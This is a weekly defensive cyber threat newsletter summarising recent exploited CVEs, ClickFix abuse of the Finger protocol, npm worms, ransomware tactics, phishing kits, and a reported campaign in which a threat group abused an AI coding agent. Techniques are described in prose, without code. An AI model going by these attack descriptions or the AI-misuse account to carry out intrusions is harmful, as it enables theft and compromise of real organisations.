Cyber Threat Weekly – #103

The week of November 10^th through November 16^th, roughly 359 cyber news articles were reviewed. A light amount of cyber threat trends and adversarial behavior news to share.  Been thinkin about the attack surface and its exponential growth.

Complexity and tool sprawl are leading to gaps we struggle to address.  AI technology is being rapidly deployed, often without solid governance and guardrails.  Identity systems are under attack.  Technical debt and legacy systems are detrimental.  Balancing business priorities, innovation, and security is tough.  At the end of the day, simplicity and a solid security foundation go a long way.

Let’s start with ‘ClickFix’ technique abusing ancient ‘finger’ protocol.  The code repository attack stories.  Semi-autonomous attack campaign shared by Anthropic.  Kraken ransomware uses a benchmark to choose between partial and full encryption.

Updated joint advisory on Akira ransomware.  It appears DanaBot has returned.  Another phishing campaign tool emerges.  Phishing campaign using self-contained HTML files. 

Broken Record Alert: Don’t get pwned by N-day vulnerabilities!!!

Known exploited software flaws are one of the top 4 initial access vectors and have increased sharply in recent months.  We continue to share n-day vulnerabilities being actively exploited.  Priority #1, start with the CISA / VulnCheck known exploited vulnerability (KEV) catalogs.  If it’s in the catalog, it should be patched.

A close #2 priority is flaws with weaponized proof of concept (PoC) code available.  Exploit chances are higher with weaponized PoC code available.  If you do nothing else with patching, have an emergency 24-to-48-hour patching process for actively exploited and weaponized PoC code available vulnerabilities.

You should consider what is exposed to the Internet.  Architecture and zero trust network access (ZTNA) can go a long way to minimizing the number of devices and services exposed to the Internet.

CISA Known Exploited Vulnerabilities – November 10^th to November 16^th:

CVE-2025-21042 – Samsung Mobile Devices Out-of-Bounds Write Vulnerability:
Could allow remote attackers to execute arbitrary code.

CVE-2025-12480 – Gladinet Triofox Improper Access Control Vulnerability:
Allows access to initial setup pages even after setup is complete.

CVE-2025-62215 – Microsoft Windows Race Condition Vulnerability:
Allows a local attacker with low-level privileges to escalate privileges. Successful exploitation of this vulnerability could enable the attacker to gain SYSTEM-level access.

CVE-2025-9242 – WatchGuard Firebox Out-of-Bounds Write Vulnerability:
May allow a remote unauthenticated attacker to execute arbitrary code.

CVE-2025-64446 – Fortinet FortiWeb Path Traversal Vulnerability:
May allow an unauthenticated attacker to execute administrative commands on the system via crafted HTTP or HTTPS requests.

‘ClickFix’ Attack Technique Abuses Ancient ‘Finger’ Protocol

Another variant of the ‘ClickFix’ technique.  The attacker is abusing the ‘Finger’ protocol to grab remote scripts, pipe the output to cmd.exe, where they are executed.  Threat actors are always innovating; this is an example.  With proper outbound filtering using the principle of least privilege, port 79 (Finger) should be blocked.

https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/

Code Repository Attack Stories

Almost every week we get several stories effecting code repositories.  First one, a worm affecting npm registry.  A second worm dubbed ‘IndonesianFoods’ floods npm registry.

https://www.csoonline.com/article/4090568/worm-flooding-npm-registry-with-token-stealers-still-isnt-under-control-2.html

https://aws.amazon.com/blogs/security/amazon-inspector-detects-over-150000-malicious-packages-linked-to-token-farming-campaign/

https://www.infosecurity-magazine.com/news/indonesianfoods-npm-worm-44000/

https://www.endorlabs.com/learn/the-great-indonesian-tea-theft-analyzing-a-npm-spam-campaign

Anthropic’s AI Abused in Semi-Autonomous Attack Campaign

A new report released by Anthropic details how a Chinese threat group abused Claude Code targeting 30 organizations.  There was plenty of human support required, but this illustrates how far AI has come in a short period. 

https://cyberscoop.com/anthropic-ai-orchestrated-attack-required-many-human-hands/

https://www.anthropic.com/news/disrupting-AI-espionage

https://assets.anthropic.com/m/ec212e6566a0d47/original/Disrupting-the-first-reported-AI-orchestrated-cyber-espionage-campaign.pdf

Benchmarks Used by Kraken Ransomware to Choose Encryption

Researchers share how this threat group benchmarks encryption performance on each machine.  A temporary file is created with random data, encrypted in a timed operation, then deleted.  The result dictates partial or full encryption.

https://www.bleepingcomputer.com/news/security/kraken-ransomware-benchmarks-systems-for-optimal-encryption-choice/

https://blog.talosintelligence.com/kraken-ransomware-group/

Akira Ransomware Targeting Nutanix AHV with Linux Encryptor

In addition to new tactics, techniques, and procedures (TTPs) the advisory shares how the ransomware actors have encrypted Nutanix VMs.  This behavior will most likely be followed by other threat actors.  Data exfil has occurred in as little as two hours.

https://www.bleepingcomputer.com/news/security/cisa-warns-of-akira-ransomware-linux-encryptor-targeting-nutanix-vms/

https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-109a

After Six Months, DanaBot has Returned

In May 2025, law enforcement disrupted DanaBot infrastructure, publicized indictments and seizures, seriously degrading the malware as a service operation.  Researchers share a few observed indicators of compromise.

https://www.bleepingcomputer.com/news/security/danabot-malware-is-back-to-infecting-windows-after-6-month-break/

https://x.com/Threatlabz/status/1987965385036230779

Quantum Route Redirect Phishing Tool

Researchers observed this new phishing kit in August.  The tool turns more sophisticated campaigns into a simple one-click operation.  Capable of bypassing certain email defenses and detecting bots, this is one to watch.

https://www.darkreading.com/endpoint-security/phishing-tool-smart-redirects-bypass-email-security

https://blog.knowbe4.com/quantum-route-redirect-anonymous-tool-streamlining-global-phishing-attack

Self-Contained HTML Files and Telegram Bots

Researchers share a campaign designed to evade defenses and steal corporate credentials.  Once the HTML file is opened, a blurred background image is displayed with a centered login modal.  If credentials are entered, JavaScript captures the data and sends to the Telegram Bot API.  Currently targeting Central and Eastern Europe, that can quickly change to any location. 

https://thecyberexpress.com/phishing-telegram-bots-steal-credentials/